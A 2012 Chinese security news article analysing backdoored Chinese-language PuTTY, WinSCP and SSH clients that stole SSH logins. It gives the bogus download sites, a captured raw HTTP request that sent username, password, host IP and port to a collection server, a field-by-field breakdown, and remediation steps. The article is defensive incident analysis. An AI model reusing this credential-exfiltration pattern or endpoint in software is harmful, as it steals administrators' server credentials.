首页 > 动态 > 关键词  > 中文版PuTTY最新资讯  > 正文

中文版putty后门事件分析

2012-02-02 09:06 · 稿源:IT168

近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。根据分析,此次事件涉及到来自putty.org.cn、putty.ws、 winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。

1.时间线

1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人所重视,目前无法确定该条微博是否与此次事件有关联:

1月30日下午16点左右:互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息,并且此消息对后门的行为特征进行了简要的描述 —— 该程序会导致root密码丢失,但发布者仍未披露具体的技术细节:

以上微博的短URL所对应的文章截图如下:

1月31日:经过一晚的酝酿,putty事件开始在互联网上广泛传播,微博、论坛等信息发布平台上开始大量出现putty后门事件的消息,同时,很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析,并陆续发布其中的技术细节。

2.事件分析

2.1问题软件源头

知道创宇安全研究团队在获取信息后,第一时间对putty等软件进行了跟踪分析。通过分析发现,来自以下几个站点的中文版putty、WinSCP、SSHSecure和psftp等软件都可能存在后门程序:

https://www.putty.org.cn

https://www.putty.ws

https://www.winscp.cc

https://www.sshsecure.com

2.2行为分析

2.2.1网络行为分析

使用带有后门程序的中文版putty等SSH管理软件连接服务器时,程序会自动记录登录时的用户名、密码和服务器IP地址等信息,并会以HTTP的方式将这些信息发送到指定的服务器上,以下是在分析过程中抓取到的原始HTTP数据:

GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2

Host: l.ip-163.com:88

Pragma: no-cache

从以上数据可以获得以下信息:

敏感信息通过HTTP GET的方式发送到服务器l.ip-163.com上(经测试,该域名与putty.org.cn位于同一IP地址上)

用于收集密码的程序地址为https:// l.ip-163.com:88/yj33/js2.asp

敏感信息以GET参数的方式发送到服务器上,相关参数为:

act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY

每个字段的作用如下:

act为执行的动作,参数add用于添加信息,经测试,也可使用del来删除信息

user为SSH服务器的IP地址,此处为50.23.79.188

pwd为连接服务器时的登录用户名,此处为abc

ll1为登录密码,此处为pass

ll2为目标服务器的SSH端口,此处为22(即,默认端口)

ll3则为客户端类型,此处为PuTTY

2.2.2服务器本地文件分析

知道创宇安全研究团队借助文件完整性校验的方式,对服务器初始安全状态下的 /etc、/lib、/usr、/bin等敏感目录进行了完整性备份,并在putty连接测试后对这些目录的文件变更、丢失和添加等情况进行了校验,校验结果显示,中文版putty并未对服务器自动安装后门程序。

网络上部分消息称,有些使用中文版putty进行过远程管理的服务器上出现恶意代码和文件,可能是由于恶意用户获取了putty所收集的密码后人为植入所致。

2.3事件后续

截止至2月1日,在本次事件中所涉及的以下域名均已不能访问:

https://www.putty.org.cn

https://putty.ws

https://www.winscp.cc

https://www.sshsecure.com

https://l.ip-163.com:88

但是,在1月31日晚,网络上传出“l.ip-163.com被黑”的消息并配有一张“受害者列表”的截图:

而就在此消息发布不久之后,互联网上便出现了完整的受害者列表供所有用户浏览和下载,根据这份来自互联网列表的显示,不但有众多政府网站位列其中,IBM、Oracle、HP等大厂商的服务器也出现在列表内。

3.安全建议

若您使用过中文版的putty、WinSCP、SSHSecure和psftp等软件,但暂时又不能对服务器进行下线处理,可采取以下临时解决方案来处理:

使用chkrootkit或rootkit hunter对服务器进行扫描,检查是否存在已知后门

查看网络是否有可疑外联,并加强对可疑外联的监控

在网络层建立端口访问控制策略,阻止除正常业务外的一切非业务、非管理端口

更换SSH登录密码,建议登录时使用证书加密码的组合方式进行身份验证

登录SSH时,不要直接使用root用户,先使用普通用户登录后,再su至root

服务器端通过TCP Wrapper或iptables等软件,限制IP访问,仅允许特定IP地址对服务器的SSH进行连接和管理

如需使用putty、WinSCP等软件,可访问其官方站点下载:

https://www.putty.org/

https://winscp.net/eng/docs/lang:chs

举报

  • 相关推荐
  • 为打击 AI 视频乱象,YouTube开启了“去货币化”模式

    随着人工智能生成的内容片段涌入平台,人们最终会采取行动来使其失去货币化……

  • 《极限挑战》官号疑似被卖上热搜:导演分享歌曲Sold Out

    知名综艺《极限挑战》官方账号异常动态引发网友广泛关注。该账号近期频发带货视频,内容风格大幅变化,被部分网友解读为可能已遭转让。社交平台讨论迅速升温,有评论借节目经典台词调侃“首次看到官方账号被卖出的情景”,更有网友直指“官方行为,或因压力所致”。作为东方卫视推出的现象级真人秀,《极限挑战》以六位固定成员为核心的“极限男人帮”为重心,通过惊险刺激的环情节奏打造高密度情节综艺,曾获“亚洲最具影响力综艺奖项”。此次账号事件不仅涉及平台运营调整,更触动对节目未来走向的关切。目前,相关方尚未正式回应,事件仍在持续发酵中。

  • AI日报:国内首个多模态AI程序员上岗;字节启动Top Seed计划招募AI人才;DeepSeek R1T Chimera上线OpenRouter

    【AI日报】今日AI领域重要动态:1.百度发布文心快码3.5及多模态AI程序员"文心快码Comate Zulu",提升开发效率;2.字节跳动启动"Top Seed"计划,招募30名AI博士人才;3.DeepSeek开源R1T Chimera模型上线OpenRouter平台;4.阿里AI工程师余亮获"全国劳动模范"称号;5.开源图像编辑工具Step1X-Edit登陆Hugging Face,性能媲美GPT-4o;6.谷歌被曝每月向三星支付巨额资金预装Gemini应用

  • 五一跟着卤鹅哥cityeat:称将给大家投喂荣昌卤鹅

    五一假期将至,重庆荣昌网红"卤鹅哥"林江将带领游客探访当地美食。作为荣昌卤鹅首席推介官,他以独特风格向全网推广家乡美食。行程中不仅介绍荣昌卤鹅的独特风味,还推荐烤乳猪、猪儿粑、油果子等特色小吃。跟随他的脚步,游客能深入了解荣昌美食文化,感受小城独特魅力。这个五一,跟随卤鹅哥品味荣昌美食,将是不容错过的文化美食之旅。

  • 三星推出Exynos Auto UA100:首款车载UWB芯片

    快科技4月14日消息,三星电子近日发布全球首款车载超宽带(UWB)芯片Exynos Auto UA100,标志着汽车互联技术迈入新纪元。这款创新芯片集射频、基带、存储和电源管理于一体,采用28nm车规级工艺和先进FCFBGA封装技术,不仅大幅降低系统成本,更以卓越的能效表现重新定义了车载连接标准。Exynos Auto UA100的核心优势在于其厘米级精度的测距能力。通过创新的飞行时间(ToF)和到达

  • 为了反爬虫 GitHub部署新规则:使用中文可能被限制访问

    据报道,GitHub部署了新的风控规则,会检查用户浏览器请求头的语言部分,如果检测到用户使用的是中文(仅限zh_CN),则可能会触发访问限制。不过GitHub并非全面封禁中文用户,而是将多个条件整合触发限制,首先会检查常规规则(如黑名单IP和UA),再检测IP地址质量。只有当这两个条件全部通过后,才会检查语言部分是否包含zh_CN,如果用户IP质量没问题,通常不会触发语�

  • GTA增强版登录XGP免费玩!XGP怎么免费玩GTA增强版

    GTA增强版上线XGP了,GTA增强版可以说是让我们的老朋友焕发了新的生机,更顶尖的游戏画面,更丰富的游戏内容,一定给各位新老朋友带来更好地体验。上XGP之后,我们的游玩也是多了一个新的选择,在XGP中入手会员就能免费玩GTA增强版,还有XGP的其他游戏,整体算起来还是比较优惠的,今天教大家XGP怎么免费玩GTA增强版。在XGP上玩游戏,要先优化网络,作为一款外服平台,�

  • Meta重组仍在继续,Reality Labs部门裁员超百人

    “提高绩效管理的标准,让绩效低下的员工尽快下岗”,扎克伯格在此前的备忘录中如是写道。同时,还敦促员工要提高积极性……

  • DuDuTalk拾音工牌SX401重磅上市,80 小时录音引领智能工牌新革命

    赛思云科技推出革命性产品DuDuTalk 4G拾音工牌SX401,专为线下服务场景打造。该产品在续航、音质和管理三大维度实现突破:80小时超长续航碾压同类产品;5米清晰拾音配合自研降噪算法;支持语音实时流传输和4G秒传功能。通过六大核心技术重新定义行业标准,解决传统工牌续航短、拾音差、管理难等痛点。适用于汽车、地产、零售、金融等多行业,提供全流程数字化管理方案,实现"全天候在线、全场景适配、全流程智能"的服务升级。产品已服务数百家企业,助力企业实现服务过程可追溯、质量可管控、效能可提升的数字化转型。

  • Intel Panther Lake首发本曝光!其它等明年

    快科技5月2日消息,根据最新消息,今年底英特尔将推出PantherLake处理器的首个SKU4P 8E 0LPE 4Xe版本,其他配置版本则要等到2026年初才会发布。4P 8E配置版本与此前传闻的4P 8E 4LPE 12Xe版本有所不同,该版本版本不包含LPE核显,搭配的是4个Xe3GPU核心。该版本TDP为45W,明显高于LunarLake的17W至28W,综合来看,这一配置显然更适合游戏笔记本,因为在这种设备中,集成显卡的重要性相对较低。目前PantherLake已曝光的SKU共有四个,具体如下:4P-Cores 8E-Cores 0LP-ECores 4Xe3Cores(45W)4P-Cores 8E-Cores 4LP-ECores 12Xe3Cores(25W)4P